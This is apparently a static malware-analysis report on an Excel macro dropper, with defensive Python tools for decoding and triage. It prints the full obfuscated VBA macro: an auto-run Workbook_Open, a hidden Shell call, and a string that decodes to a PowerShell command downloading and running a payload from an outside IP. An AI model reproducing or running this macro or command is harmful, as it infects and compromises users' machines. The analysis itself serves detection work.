Xls.Dropper.Agent-1571319 — Office (OLE) malware analysis

Static analysis result for SHA-256 4ad7ed1ab9734ce4…

MALICIOUS

Office (OLE)

Size: 56.5 KB
Created: 1996-10-08 23:32:33 (OLE summary-information timestamp, written by the authoring application and trivially forgeable; it predates the first sighting by almost two decades)
Authoring application: Microsoft Excel
First seen: 2015-03-15
MD5: 778ab8b6d5aace23a82e116bca639763
SHA-1: eae5003689ac0e66da255f20da282801f9d68037
SHA-256: 4ad7ed1ab9734ce40601e2283c3f1bb00607770c517901c322a33c41894ce720
Risk score: 150

Malware Insights

Xls.Dropper.Agent-1571319 · confidence 95%

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution
Mapping caveat: T1203 is the classifier's label, but nothing in the static output is an exploit; the chain runs only if the recipient enables macros, which is T1204.002 User Execution: Malicious File. The decoded Shell command also covers T1059.001 PowerShell and T1105 Ingress Tool Transfer (HTTP download of the .cab payload), neither of which is tagged above.

The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-1571319. The signature matches the OLE container; the VBA source extracted from it (macros.bas below) is not flagged on its own. The VBA project is a stock Russian-locale Excel workbook (ЭтаКнига is ThisWorkbook, Лист1..Лист3 are Sheet1..Sheet3) whose Workbook_Open handler calls vgfhGGGgfhhdfh in Module11. That procedure passes a long string literal through esardhHvsmEBZuSZUhk in Module4 and hands the result to Shell with vbHide, so the child process starts without a visible window. Everything else in the project is padding: ninety-odd empty Sub/Function stubs with mangled names spread over Module1, Module2, Module5 and Class1..Class3, and a chain of GoTo statements inside the decoder that each jump to the label on the very next line. Stripped of that padding, the decoder is a For ... To Len(s) Step 2 loop that appends Mid(s, i, 1), i.e. it keeps every second character of its argument and discards the interleaved filler. Applying that to the literal in Module11 yields a cmd /K PowerShell.exe one-liner that calls System.Net.WebClient.DownloadFile to fetch a .cab from http://185.48.56.137/ into %TEMP%, unpacks it with expand and starts the extracted .exe, which is the second-stage payload the dropper classification refers to. Nothing in the document exploits Excel: the chain depends on the user opening the workbook and enabling macros, so durable detection keys on Excel spawning cmd.exe with a PowerShell command line and on expand.exe and a fresh executable launching from %TEMP%, not on the container signature alone, which a re-obfuscated build of the same macro will not trip.
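The decoder is simple enough to replay outside Excel, which is safer than enabling the macro to watch what it does. The block below is an added example, not code from the sample, from ClamAV or from oletools: it re-implements esardhHvsmEBZuSZUhk over the literal passed to it in Module11 (copied verbatim from the decoded source further down) and pulls the indicators out of the result. decode_stride, split_stages and extract_iocs are names chosen for this example, and decode_stride generalises the loop to any start offset and stride although the sample only ever uses Step 2.

```python
"""Replay the macro's string decoder outside Excel.

Added example, not code from the sample, from ClamAV or from oletools.
esardhHvsmEBZuSZUhk() in Module4 is a `For i = 1 To Len(s) Step 2` loop
that appends Mid(s, i, 1): it keeps the characters at odd 1-based
positions and drops the interleaved filler, and every GoTo in it jumps
to the label on the next line, so the GoTo/label pairs do nothing.
OBFUSCATED is the literal passed to it in Module11, copied verbatim.
"""
import re

OBFUSCATED = (
    r"cFmxdF \/PKs SP o_wte rxS*hKehlvly.'eUxKeѓ #(bNne/w>-*Ogb^j_e\cetH "
    r"UScyѓsStQepm].bNRe‚tV.-W)ejbTC|liiWern†te)d.KDLoЂw-nEl{o=aydCFei}lfea(U'xhst:t "
    r"p0:;/4/J1k8m52.54G8t.P5$6C.Ѓ1)3N7^/Js†s}d~y{n…ahmZoho?srsV/us|s‚pri>duaMr.s&st.7c%awb.'A,„'„%kTQE…MLPd%Ђ\\F~gcdjg8F…FЂFug4f.gZF„.Oc[aSbj'p)(;Q "
    r"TefxypoaDnbd† I%nTcEOM(P9%:\7F@g$dzg$F^FwFvg1f8g=F-.]czalbN "
    r"+%/TWE*M3PM%a\%F?g'dpgAFlFiF;g|f9g‚F&.Xe'x<e0;T Nszt@aor`tX "
    r"o%+THEqMYPl%5\+FdggdBgiFsFѓFngGfYgZFV.`e)x6eD;~"
)


def decode_stride(blob, start=1, step=2):
    """Generalised mirror of the VBA loop: keep the characters at 1-based
    positions start, start+step, ... The sample uses start=1, step=2, i.e.
    every second character; other strides are the obvious variant."""
    if start < 1 or step < 1:
        raise ValueError("start and step are 1-based positive integers")
    return blob[start - 1::step]


def split_stages(command):
    """cmd /K hands everything after PowerShell.exe to PowerShell (cmd has
    already expanded %TEMP%), and in PowerShell ';' separates statements."""
    return [s.strip() for s in command.split(";") if s.strip()]


def extract_iocs(command):
    """Pull the network, file-system and tooling indicators out of the line.
    The 'tools' check is a plain substring match, good enough for triage."""
    return {
        "urls": re.findall(r"https?://[^\s'\")]+", command),
        "paths": sorted(set(re.findall(r"%TEMP%\\[\w.]+", command))),
        "downloader": "WebClient).DownloadFile" in command,
        "tools": [t for t in ("cmd", "PowerShell.exe", "expand", "start") if t in command],
    }


if __name__ == "__main__":
    decoded = decode_stride(OBFUSCATED)
    for n, stage in enumerate(split_stages(decoded), 1):
        print("stage %d: %s" % (n, stage))
    print(extract_iocs(decoded))
```

Run it as a script to print the three PowerShell statements and the indicator dictionary. The odd-looking non-ASCII characters in the literal are filler: every one of them sits on a position the loop discards, so the copy survives the page's text extraction intact. Everything after PowerShell.exe is one PowerShell command line; cmd.exe has already expanded %TEMP% before PowerShell starts, and within PowerShell expand resolves to expand.exe while start is the alias for Start-Process.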

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-1571319 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-1571319
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell kggTUI6FREGfdg, vbHide
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8048 bytes
SHA-256: 913e4dab0ab3a0d5575542e5a936d03860fb1c0336c5f515d9dc5a21e8cfa5aa
Detection
ClamAV: No threats found (the Xls.Dropper.Agent-1571319 hit above is on the OLE container; the decoded macro text alone does not match it, so a re-packed build of the same macro needs either a new signature or a behavioural detection)
Obfuscation or payload: likely
98 of 160 identifiers look randomly generated (e.g. 'iEdjfqtIefpytnFatndIQRPUGzGl'), consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
vgfhGGGgfhhdfh
End Sub


Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Function iEdjfqtIefpyt()

End Function
Public Sub atndIQRPUGz()

End Sub
Private Sub xMQTKkzscJ()

End Sub
Public Function NcmHUHuUrqSA()

End Function
Public Function hHSMfczUtlht()

End Function
Public Sub irPJnpVqv()

End Sub
Public Function iihlIPQBNNdhkcA()

End Function
Public Sub adxaespYl()

End Sub
Private Function uGjCiFY()

End Function
Private Function dvfBlwB()

End Function
Private Function pxyHg()

End Function
Public Sub msLTJpkljoZ()

End Sub
Private Sub feukmeDgKIr()

End Sub
Public Sub hvFonbbC()

End Sub
Private Sub SyQoAomgyv()

End Sub
Public Sub SOarsNOZwdGVC()

End Sub
Public Sub aFABzEp()

End Sub
Public Sub vgwADuTwbLHvQG()

End Sub
Private Function EEreEboCjBnrQEC()

End Function
Private Function iEdjfqtIefpytnFatndIQRPUGzGl()

End Function
Private Function QTKkzscJMhJNc()

End Function
Private Sub HuUrqSARDHhHSM()

End Sub

Attribute VB_Name = "Module2"
Private Sub StPOrZ()

End Sub
Public Sub FgrlDAtRJFRjxSGPniLNu()

End Sub
Private Function RxGGEhovammBFIAZo()

End Function
Private Function BVyCQMwJjj()

End Function
Private Function HbGewV()

End Function
Private Function TDaJUaQizN()

End Function
Private Sub EyceKQ()

End Sub
Private Function NIJHMx()

End Function
Private Function CCSIK()

End Function
Public Sub KIrfzq()

End Sub
Public Function onbbCKQzSyQ()

End Function
Public Function mgyvRBMS()

End Function
Public Function sNOZwdGV()

End Function
Public Function kaFAB()

End Function
Public Sub jqTvgwAD()

End Sub
Private Sub bLHvQGxLV()

End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function vammBFIA()

End Function
Private Sub QyBVyC()

End Sub
Public Sub JjjKSfHbG()

End Sub
Private Function wHBTDaJUaQizNVQ()

End Function
Public Function ceKQksiNIJ()

End Function
Private Function ELcCCSIKCc()

End Function
Private Function ODYOFS()

End Function
Private Function zzbjvYrQuMZMK()

End Function
Public Function qalqnyPQmnwUBf()

End Function
Public Function AIyeZa()

End Function
Public Function GOsTEUZbSsUzk()

End Function
Private Function fVkuddPC()

End Function
Public Sub bHZLPpdbUnkGd()

End Sub

Attribute VB_Name = "Module11"
Sub vgfhGGGgfhhdfh()
kggTUI6FREGfdg = esardhHvsmEBZuSZUhk("cFmxdF \/PKs SP o_wte rxS*hKehlvly.'eUxKeѓ #(bNne/w>-*Ogb^j_e\cetH UScyѓsStQepm].bNRe‚tV.-W)ejbTC|liiWern†te)d.KDLoЂw-nEl{o=aydCFei}lfea(U'xhst:t p0:;/4/J1k8m52.54G8t.P5$6C.Ѓ1)3N7^/Js†s}d~y{n…ahmZoho?srsV/us|s‚pri>duaMr.s&st.7c%awb.'A,„'„%kTQE…MLPd%Ђ\\F~gcdjg8F…FЂFug4f.gZF„.Oc[aSbj'p)(;Q TefxypoaDnbd† I%nTcEOM(P9%:\7F@g$dzg$F^FwFvg1f8g=F-.]czalbN +%/TWE*M3PM%a\%F?g'dpgAFlFiF;g|f9g‚F&.Xe'x<e0;T Nszt@aor`tX o%+THEqMYPl%5\+FdggdBgiFsFѓFngGfYgZFV.`e)x6eD;~")
Shell kggTUI6FREGfdg, vbHide
End Sub





Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub SMfczUtlhtKZ()

End Sub
Public Sub PJnpVqvD()

End Sub
Public Function ihlIPQ()

End Function
Public Function dhkcAPIsadxae()

End Function
Private Sub lKKmuGjCiFYxYjd()

End Sub
Public Sub lwByJbpxyH()

End Sub
Public Function FmsLTJpkljo()

End Function
Private Sub Dfeukme()

End Sub
Private Function IrfzqhvFonbb()

End Function
Public Sub zSyQoAomgyvRBMSarsNOZwdGVCJc()

End Sub
Private Sub ABzEpjqTvgw()

End Sub
Private Function TwbLHvQGx()

End Function
Public Sub EreEboCjBnr()

End Sub

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub pqoteY()

End Sub
Public Function UlpsjIYQAikFimA()

End Function
Public Sub gStPOrZqc()

End Sub
Private Function rlDAQt()

End Function
Public Sub RjxSGPniLNu()

End Sub
Private Function RxGGE()

End Function
Private Function vammBFIAohQyBVyCQMwJjjK()

End Function
Private Function bGewVwHBTDaJ()

End Function
Public Function izNVQgEyceKQksi()

End Function
Public Sub HMxELcCCSIKC()

End Sub
Private Function hODYOFS()

End Function
Private Sub zzbjvYrQuMZMKQTqalqnyPQm()

End Sub
Private Function BfubhAIyeZaYdN()

End Function
Private Sub TEUZbSsUz()

End Sub
Private Sub pfVkuddPCdzMbH()

End Sub
Public Function pdbUnkGdBHDOR()

End Function
Private Function NQRvKeyQLAh()

End Function
Public Sub teYfIVUl()

End Sub

Attribute VB_Name = "Module3"

Attribute VB_Name = "Module4"

Public Function esardhHvsmEBZuSZUhk(CDNQRvKeyQ As String) As String
GoTo IYQAikFi
IYQAikFi:
GoTo KftgStPOrZqcg
KftgStPOrZqcg:
GoTo rlDAQtR
rlDAQtR:
For AhpqoteYfIVUlp = 1 To Len(CDNQRvKeyQ) Step 2
GoTo jxSGPniLNuOTcRxGGE
jxSGPniLNuOTcRxGGE:
GoTo ovammBF
ovammBF:
GoTo ZohQyBVyCQMwJ
ZohQyBVyCQMwJ:
GoTo KSfHbGe
KSfHbGe:
GoTo wHBTDaJUaQizNVQgEyce
wHBTDaJUaQizNVQgEyce:
esardhHvsmEBZuSZUhk = esardhHvsmEBZuSZUhk & Mid(CDNQRvKeyQ, AhpqoteYfIVUlp, 1)
GoTo siNIJHMx
siNIJHMx:
GoTo cCCSIKCcEjhODYOF
cCCSIKCcEjhODYOF:
GoTo MLzzbj
MLzzbj:
GoTo rQuMZMKEQTqalqnyPQmn
rQuMZMKEQTqalqnyPQmn:
GoTo BfubhAIyeZaYdNGOsTE
BfubhAIyeZaYdNGOsTE:
GoTo bSsUzkgTpfVkuddPCdzM
bSsUzkgTpfVkuddPCdzM:
Next
GoTo LPpdbUnkGdBHDORhCDNQ
LPpdbUnkGdBHDORhCDNQ:
GoTo KeyQLAhpqot
KeyQLAhpqot:
GoTo fIVUlpsjIYQAikFimAKf
fIVUlpsjIYQAikFimAKf:
GoTo StPOrZq
StPOrZq:
GoTo FgrlDA
FgrlDA:
End Function


Attribute VB_Name = "Module5"
Public Function qvDtZiihlIPQBNN()

End Function
Public Sub cAPIsad()

End Sub
Private Function spYlKK()

End Function
Public Function jCiFYxYjdvfB()

End Function
Public Function yJbpxyHgbDF()

End Function
Private Sub TJpkljoZgnDfe()

End Sub
Public Function eDgKIrf()

End Function
Private Function vFonbb()

End Function
Public Function zSyQoAomgyvRBMS()

End Function
Private Sub sNOZwdGVJckaFABzEpj()

End Sub
Private Function gwADuTwbL()

End Function
Private Sub GxLVEEreEboCjB()

End Sub
Private Sub ECwOLiEdjfqtIe()

End Sub
Private Sub tQnFatndIQ()

End Sub
Private Sub GzGlxxMQTKkzscJ()

End Sub
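Most of the 8 KB above is padding, and the same three tricks (empty stubs with mangled names, GoTo/label pairs, procedures nothing calls) recur across macro droppers. The block below is an added example, not code from the page, from ClamAV or from oletools: it reduces a dump of this shape to the procedures actually reachable from Workbook_Open and counts the padding, using a constructed excerpt that mirrors the dump's layout (the string literal in it is a stand-in, not the real argument). parse_procedures, strip_goto_noise, reachable, looks_mangled and reduce_macro are names chosen here, and looks_mangled is a deliberately conservative heuristic tuned on this sample's identifiers, not the rule behind the "98 of 160" figure in the artifact record.

```python
"""Reduce an olevba dump of the shape shown above to its live code.

Added example, not code from the page, from ClamAV or from oletools. It undoes
the dump's three padding tricks: empty stub procedures with mangled names,
GoTo statements whose label is the very next line, and procedures nothing
calls. SAMPLE is a constructed excerpt in the dump's layout; its string
literal is a short stand-in for the real argument.
"""
import re

SAMPLE = '''Sub Workbook_Open()
vgfhGGGgfhhdfh
End Sub
Private Function iEdjfqtIefpyt()
End Function
Public Sub atndIQRPUGz()

End Sub
Sub vgfhGGGgfhhdfh()
kggTUI6FREGfdg = esardhHvsmEBZuSZUhk("cXmXdX")
Shell kggTUI6FREGfdg, vbHide
End Sub
Public Function esardhHvsmEBZuSZUhk(CDNQRvKeyQ As String) As String
GoTo IYQAikFi
IYQAikFi:
For AhpqoteYfIVUlp = 1 To Len(CDNQRvKeyQ) Step 2
GoTo ovammBF
ovammBF:
esardhHvsmEBZuSZUhk = esardhHvsmEBZuSZUhk & Mid(CDNQRvKeyQ, AhpqoteYfIVUlp, 1)
Next
GoTo FgrlDA
FgrlDA:
End Function
'''

PROC_START = re.compile(r"^\s*(?:Public\s+|Private\s+)?(Sub|Function)\s+(\w+)\s*\(", re.I)
PROC_END = re.compile(r"^\s*End\s+(?:Sub|Function)\s*$", re.I)
GOTO = re.compile(r"^\s*GoTo\s+(\w+)\s*$", re.I)


def parse_procedures(text):
    """{name: {kind, header, body}} in source order; Attribute lines are ignored."""
    procs, cur = {}, None
    for line in text.splitlines():
        m = PROC_START.match(line)
        if cur is None and m:
            cur = {"kind": m.group(1), "header": line.strip(), "body": []}
            procs[m.group(2)] = cur
        elif cur is not None and PROC_END.match(line):
            cur = None
        elif cur is not None:
            cur["body"].append(line.rstrip())
    return procs


def strip_goto_noise(lines):
    """Drop `GoTo X` immediately followed by `X:`; the pair does nothing."""
    out, i = [], 0
    while i < len(lines):
        m = GOTO.match(lines[i])
        if m and i + 1 < len(lines) and lines[i + 1].strip() == m.group(1) + ":":
            i += 2  # skip the jump and its label
        else:
            out.append(lines[i])
            i += 1
    return out


def reachable(procs, root):
    """Procedure names referenced, transitively, from the auto-run entry point."""
    seen, todo = set(), [root]
    while todo:
        name = todo.pop()
        if name in seen or name not in procs:
            continue
        seen.add(name)
        body = "\n".join(procs[name]["body"])
        todo.extend(t for t in re.findall(r"[A-Za-z_]\w*", body) if t in procs)
    return seen


def looks_mangled(name):
    """Conservative test: nearly vowelless, a consonant run of four or more, or
    five capitals in a row. PascalCase names such as Workbook_Open pass."""
    letters = re.sub(r"[^A-Za-z]", "", name)
    if len(letters) < 6:
        return False
    vowel_ratio = sum(c in "aeiouAEIOU" for c in letters) / len(letters)
    consonant_run = max((len(r) for r in re.findall(r"[^aeiouAEIOU]+", letters)), default=0)
    upper_run = max((len(r) for r in re.findall(r"[A-Z]+", letters)), default=0)
    return vowel_ratio < 0.2 or consonant_run >= 4 or upper_run >= 5


def reduce_macro(text, root="Workbook_Open"):
    """Count the padding and emit only the procedures reachable from root."""
    procs = parse_procedures(text)
    live = reachable(procs, root)
    src = []
    for name, p in procs.items():
        if name in live:
            src += [p["header"]] + strip_goto_noise(p["body"]) + ["End " + p["kind"]]
    return {
        "procedure_count": len(procs),
        "empty": [n for n, p in procs.items() if not any(l.strip() for l in p["body"])],
        "mangled": [n for n in procs if looks_mangled(n)],
        "live": sorted(live),
        "live_source": "\n".join(src),
    }
```

Feed the full macros.bas text to reduce_macro and the live_source that comes back is the Workbook_Open handler, Module11 and the decoder with the GoTo padding removed; the "empty" list is the stub inventory. The stripper only removes a jump whose label is the next line, so a GoTo that genuinely changes control flow survives and still has to be read by hand.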